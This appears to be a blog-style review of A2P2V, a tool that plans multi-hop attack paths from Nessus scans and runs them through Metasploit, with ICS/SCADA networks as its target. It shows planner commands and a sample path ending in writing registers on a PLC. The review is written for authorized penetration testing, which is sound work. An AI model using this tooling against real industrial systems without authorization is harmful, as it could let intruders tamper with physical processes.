A2P2V: Automating Attack Path Discovery from Vulnerability Scans to Metasploit Exploits
Hook
What if you could feed raw Nessus scans into a tool and get back a ranked list of multi-hop attack paths complete with ready-to-execute Metasploit commands? That’s exactly what A2P2V does, and it’s designed specifically for ICS/SCADA environments.
Context
Penetration testing typically involves a tedious manual process: scan the network with Nessus or Nmap, analyze vulnerability findings, cross-reference CVEs with available exploits in Metasploit, manually plan lateral movement paths, and finally execute attacks one hop at a time. For complex networks—especially industrial control systems with multiple network segments and interdependencies—this planning phase can consume days of expert time. Non-security stakeholders struggle to understand the risk when presented with raw vulnerability scan output.
A2P2V (Automated Attack Path Planning and Validation) was developed jointly by Toshiba Corporation and Peraton Labs to solve this specific problem. The tool automates the translation from passive vulnerability data to actionable attack sequences, generating ranked paths that show not just that a system is vulnerable, but exactly how an attacker could chain exploits to reach critical assets. This is particularly valuable in ICS/SCADA environments where understanding the full attack chain—from an internet-facing gateway through multiple network hops to a programmable logic controller—is essential for risk assessment and remediation prioritization.
Technical Insight
A2P2V’s architecture centers on a graph-based planning system that models network topology as nodes and exploits as edges. The key innovation is its use of PAP (Pre-condition, Action, Post-condition) modeling to describe exploit capabilities. Each capability in the system defines what must be true before an exploit can run (pre-conditions like “network access to port 445”), what the exploit does (action like “exploit/windows/smb/ms17_010_eternalblue”), and what new access or knowledge the attacker gains (post-conditions like “shell access on target”).
The workflow starts by loading capability definitions from YAML files. On first run, you import these definitions:
a2p2v --cpdb lab_config/capabilities_metasploit.ymlThese capability files describe exploits in a machine-readable format that the planner can reason about. When you run A2P2V in planning mode against a network, it ingests your Nessus XML output, network topology XML, initial attacker position, and goal state. The planner then performs graph traversal to find all possible paths from your starting point to the goal, ranking them by a composite score based on path length and exploit reliability.
Running the planner looks like this:
a2p2v --planThe output presents a table of attack trees showing the hop sequence and final capability needed:
TREE#|SCORE|HOPS |FINAL CAPABILITY OPTIONS |GOALS
-----|-----|-----------------------------------|--------------------------------------------------|--------------
0| 6.24|GW(1)>HMI(4)>OPC(4)>PLC(1) |action=WRITE_REGISTERS |change_temp
-----|-----|-----------------------------------|--------------------------------------------------|--------------
1| 6.24|GW(1)>HMI(4)>EWS10(4)>PLC(1) |action=WRITE_REGISTERS |change_tempEach path shows not just the hosts to compromise, but the number of possible exploits at each hop (the numbers in parentheses). The system generates detailed reports in the reports/ directory showing the specific Metasploit commands needed to execute the selected path, complete with the proper options and payloads configured for each hop.
For simpler scenarios, A2P2V also supports single-host targeting. Point it at a specific target from your topology:
a2p2v --target USER1The tool queries its capability database for all exploits applicable to that host’s vulnerabilities and presents them in a ranked list. You can execute individual exploits or all applicable ones. This mode is useful for validating that specific vulnerabilities are actually exploitable, not just theoretically present in scan results.
The integration with Metasploit happens through the RPC daemon. A2P2V doesn’t just suggest exploits—it can execute the entire attack sequence automatically by connecting to msfrpcd (typically running in a Docker container on port 55552) and issuing the proper commands in sequence. This automation is powerful for red team exercises where you need to demonstrate full attack chains repeatably, though it requires careful scoping and authorization given the system’s ability to execute real exploits.
The scoring algorithm balances multiple factors: shorter paths score higher (fewer opportunities for failure), exploits with higher reliability ratings score higher, and paths with more alternative options at each hop score higher (providing fallback if one exploit fails). This pragmatic scoring reflects real penetration testing priorities—you want the path most likely to succeed, not just any path that theoretically works.
Gotcha
A2P2V’s tight coupling to Metasploit is both a strength and a significant limitation. Your exploit coverage is restricted to what Metasploit supports, which means newer CVEs or specialized exploits not yet in Metasploit modules won’t be considered in attack planning. The tool also requires the Metasploit RPC daemon running, adding operational complexity and potential security concerns if not properly isolated.
The setup overhead is substantial. You need to manually create network topology XML files describing your environment’s hosts and network connectivity. The README doesn’t provide detailed format specifications for these XML files, forcing you to reverse-engineer the expected structure from examples. Similarly, while capability definitions are provided for Metasploit modules, extending the system with custom exploits or environmental-specific attack techniques requires writing YAML definitions in the PAP format without comprehensive documentation on all available pre-condition and post-condition types. This makes A2P2V challenging to adapt for environments with custom applications or non-standard network architectures. The tool assumes you have time for careful preparation and configuration—it’s not suited for rapid-response scenarios where you need to start testing immediately after arriving on-site.
Verdict
Use A2P2V if you’re conducting penetration tests on complex, multi-segment networks where understanding attack chains is more valuable than quickly exploiting individual vulnerabilities. It excels in ICS/SCADA environments, red team exercises requiring detailed planning and reporting, and scenarios where you need to communicate technical attack paths to non-security stakeholders through generated reports. The automated translation from vulnerability scans to executable attack sequences is genuinely time-saving once the initial setup is complete. Skip it if you need flexibility beyond Metasploit’s module set, lack time for environment configuration and topology mapping, prefer interactive exploitation workflows over automated sequences, or work primarily on simple network topologies where manual exploit chaining is straightforward. Also be aware that with 68 GitHub stars and copyright through 2023, community support may be limited and you may need to handle troubleshooting and extensions independently.
